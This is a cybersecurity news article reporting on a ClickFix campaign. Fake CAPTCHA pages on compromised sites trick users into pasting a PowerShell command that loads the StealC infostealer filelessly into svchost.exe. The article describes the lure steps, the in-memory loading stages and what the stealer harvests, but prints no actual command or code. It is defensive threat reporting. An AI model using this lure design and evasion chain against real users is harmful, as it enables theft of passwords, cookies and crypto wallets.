The “Windows + R” Trap: ClickFix Scam Tricks Users into Installing StealC Malware
Ddos 
The compromised website loads a malicious script | Image: LevelBlue
A new report from LevelBlue dissects a sophisticated multi-stage malware campaign that turns a routine security check into a point of infection. The campaign, which deploys the StealC information stealer, relies on a “ClickFix” social engineering tactic that tricks users into executing malicious code under the guise of proving they are human.
The attack is notable for its use of “fileless” execution, meaning the malware runs almost entirely in memory, leaving little trace on the victim’s hard drive for traditional antivirus tools to find.
The infection begins when a user visits a compromised website—in one observed case, a Vietnamese restaurant’s page—that has been injected with malicious JavaScript. This script redirects the user to a fake CAPTCHA page that mimics a Cloudflare security check.
Instead of clicking images of traffic lights, the user is given a set of technical instructions:
- Press Windows Key + R to open the Run dialog.
- Press Ctrl + V to paste a command.
- Press Enter.
“The ClickFix technique exploits user trust. Users believe they’re completing a legitimate verification step and do not realize they are executing malware,” the report explains.
The command they paste is a malicious PowerShell script that triggers the infection chain. “The use of keyboard shortcuts (Win+R, Ctrl+V) makes the process feel technical and legitimate,” effectively bypassing user suspicion.
Once the user hits Enter, the malware executes a series of “fileless” stages designed to evade detection.
- Stage 1: A PowerShell loader downloads shellcode directly into memory.
- Stage 2: A position-independent shellcode loader (generated by the Donut framework) prepares the system.
- Stage 3: A PE downloader injects the final payload into a legitimate Windows process, svchost.exe.
“All stages except the final payload operate in memory, defeating disk-based scanning and leaving minimal forensic artifacts,” the report notes. By hiding inside svchost.exe, the malware operates “under the trust of a Windows service, evading application whitelisting and behavioral analysis”.
The final payload is StealC, a powerful “Malware-as-a-Service” tool designed to harvest a vast amount of sensitive data. It targets:
- Browser Data: Passwords, cookies, and credit card info from over a dozen browsers.
- Crypto Wallets: Private keys and seed phrases from over 50 browser extensions and desktop wallets like MetaMask and Exodus.
- System Info: Detailed hardware profiles and screenshots.
The stolen data is exfiltrated to a Command and Control (C2) server using RC4-encrypted HTTP traffic, making it difficult for network defenders to spot the theft in progress.
The report concludes that this campaign represents a significant evolution in commodity malware. “The use of social engineering (ClickFix), fileless execution, reflective loading, and encrypted C2 communication creates a formidable threat that evades traditional security controls,” LevelBlue researchers warn.
For organizations, the lesson is clear: “Social Engineering Remains the Weakest Link… Security awareness training must address fake CAPTCHA and verification prompts”.
Related Posts:
- PDFFlex: Analyzing PUA Persistence and Evasion Techniques
- StealC Infostealer Spreads in New Disguise, Targets User Data
- StealC V2: ThreatLabz Unveils the Evolution of a Stealthy Info-Stealer and Malware Loader
- “ClickFix” Trap: Fake Human Verification Leads to Qilin Ransomware Infection
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
